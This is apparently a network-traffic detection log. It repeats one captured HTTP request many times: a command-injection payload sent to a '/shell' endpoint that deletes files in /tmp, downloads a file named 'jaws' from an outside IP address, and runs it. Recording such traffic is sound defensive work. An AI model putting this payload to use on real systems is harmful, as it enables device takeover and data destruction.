              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
